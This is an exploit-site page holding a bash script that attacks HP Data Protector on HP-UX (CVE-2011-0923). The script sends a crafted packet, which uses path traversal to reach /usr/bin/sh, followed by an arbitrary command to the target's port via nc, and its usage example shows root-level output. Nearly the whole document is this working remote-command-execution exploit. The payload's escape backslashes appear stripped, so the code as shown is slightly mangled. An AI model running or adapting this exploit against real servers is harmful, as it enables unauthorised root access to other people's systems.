Home / exploits HP Data Protector Remote Shell
Posted on 05 August 2011
#!/bin/bash # Exploit Title: HP Data Protector Remote Shell for HPUX # Date: 2011-08-02 # Author: Adrian Puente Z. # Software Link:http://www8.hp.com/us/en/software/software- # product.html?compURI=tcm:245-936920&pageTitle=data-protector # Version: 0.9 # Tested on: HPUX # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/ # Document.jsp?objectID=c02781143 # # Powered by Hackarandas www.hackarandas.com # Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks # Lots of thanks to David Llorens (@c4an) for all the help. # Ported to HPUX from fdisk's (@fdiskyou) Windows version. # Windows version: http://www.exploit-db.com/exploits/17339/ # # # Shouts to shellhellboy, r3x, r0d00m, etlow, # psymera, nitr0us and ppl in #mendozaaaa # # [ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` <host> <port> <commands> `basename ${0}` 10.22.33.44 5555 id X15 [12:1] uid=0(root) gid=0(root) " && exit 0 HOST=`echo ${@} | awk '{print $1}'` PORT=`echo ${@} | awk '{print $2}'` CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}' *//g'` SC="" SC=${SC}"x00x00x00xa4x20x32x00x20x2dx2dx63x68x30x6bx73x2d" SC=${SC}"x00x20x30x00x20x53x59x53x54x45x4dx00x20x2dx63x68" SC=${SC}"x30x6bx73x2dx2dx00x20x43x00x20x32x30x00x20x2dx2d" SC=${SC}"x63x68x30x6bx73x2dx00x20x50x6fx63x00x20x2dx72x30" SC=${SC}"x30x74x2dx72x30x30x74x2dx00x20x2dx72x30x30x74x2d" SC=${SC}"x72x30x30x74x2dx00x20x2dx72x30x30x74x2dx72x30x30" SC=${SC}"x74x2dx00x20x30x00x20x30x00x20x2ex2ex2fx2ex2ex2f" SC=${SC}"x2ex2ex2fx2ex2ex2fx2ex2ex2fx2ex2ex2fx2ex2ex2fx2e" SC=${SC}"x2ex2fx2ex2ex2fx75x73x72x2fx62x69x6ex2fx73x68x00" SC=${SC}"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" SC=${SC}"x00x00x00x00x00x00x00x00x00" SHELLCODE=${SC} ( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}
